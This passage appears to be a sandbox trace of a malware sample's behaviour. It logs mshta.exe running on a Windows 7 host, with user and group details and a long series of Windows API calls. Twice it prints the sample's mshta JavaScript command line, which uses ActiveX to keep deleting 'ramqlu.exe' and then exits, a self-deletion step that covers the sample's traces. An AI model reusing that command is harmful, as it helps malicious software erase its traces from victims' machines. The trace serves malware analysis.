\"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x90 [0060.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfbf4 | out: lpSystemTimeAsFileTime=0x2cfbf4*(dwLowDateTime=0xede70880, dwHighDateTime=0x1d61645)) [0060.075] GetCurrentProcessId () returned 0x358 [0060.075] GetCurrentThreadId () returned 0x90 [0060.075] GetTickCount () returned 0x114789a [0060.075] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfbec | out: lpPerformanceCount=0x2cfbec*=18042976701) returned 1 [0060.075] GetModuleHandleA (lpModuleName=0x0) returned 0x970000 [0060.075] GetStartupInfoA (in: lpStartupInfo=0x2cfb00 | out: lpStartupInfo=0x2cfb00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.075] GetVersionExA (in: lpVersionInformation=0x2cfb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cfb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.075] HeapCreate (flOptions=0x0, 
dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x760000 [0060.076] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0060.076] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0060.077] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.077] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.077] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.078] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.078] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.079] GetModuleHandleW (lpModuleName="kernelbase.dll") returned 0x76c10000 [0060.079] 
GetProcAddress (hModule=0x76c10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c2004f [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.079] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.079] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.080] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.080] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.081] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.081] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, 
lpProcName="DecodePointer") returned 0x77c79d35 [0060.082] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.082] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.083] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.083] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x214) returned 0x7607d0 [0060.084] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.084] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x76c10000 [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="EncodePointer") returned 0x77c80fcb [0060.084] GetProcAddress (hModule=0x76c10000, lpProcName="DecodePointer") returned 0x77c79d35 [0060.084] GetStartupInfoA (in: lpStartupInfo=0x2cfa84 | out: lpStartupInfo=0x2cfa84*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.084] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x480) returned 0x7609f0 [0060.084] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0060.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0060.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0060.085] 
SetHandleCount (uNumber=0x20) returned 0x20 [0060.085] GetCommandLineA () returned="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"" [0060.085] GetEnvironmentStringsW () returned 0x420260* [0060.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0060.085] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x565) returned 0x760e78 [0060.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x760e78, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0060.085] FreeEnvironmentStringsW (penv=0x420260) returned 1 [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetLastError () returned 0x0 [0060.085] SetLastError (dwErrCode=0x0) [0060.085] GetACP () returned 0x4e4 [0060.085] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x220) returned 0x7613e8 [0060.085] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cfa5c | out: lpCPInfo=0x2cfa5c) returned 1 [0060.086] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2cf528 | out: lpCPInfo=0x2cf528) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2cf4b8 | out: lpCharType=0x2cf4b8) returned 1 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, 
cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf2a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā") returned 256 [0060.086] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ獏\x97Ā", cchSrc=256, lpCharType=0x2cf53c | out: lpCharType=0x2cf53c) returned 1 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 
¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā") returned 256 [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.086] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梺?Ā", cchSrc=256, lpDestStr=0x2cf038, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0060.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, 
lpMultiByteStr=0x2cf83c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿnfxÞtú,", lpUsedDefaultChar=0x0) returned 256 [0060.086] GetLastError () returned 0x0 [0060.086] SetLastError (dwErrCode=0x0) [0060.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0060.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf93c, cbMultiByte=256, lpWideCharStr=0x2cf268, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā") returned 256 [0060.087] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0060.087] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梚?Ā", cchSrc=256, lpDestStr=0x2cf058, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0060.087] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x2cf73c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿnfxÞtú,", lpUsedDefaultChar=0x0) returned 256 [0060.087] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x97b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.087] GetLastError () 
returned 0x0 [0060.087] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.088] SetLastError (dwErrCode=0x0) [0060.088] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] SetLastError (dwErrCode=0x0) [0060.089] GetLastError () returned 0x0 [0060.089] 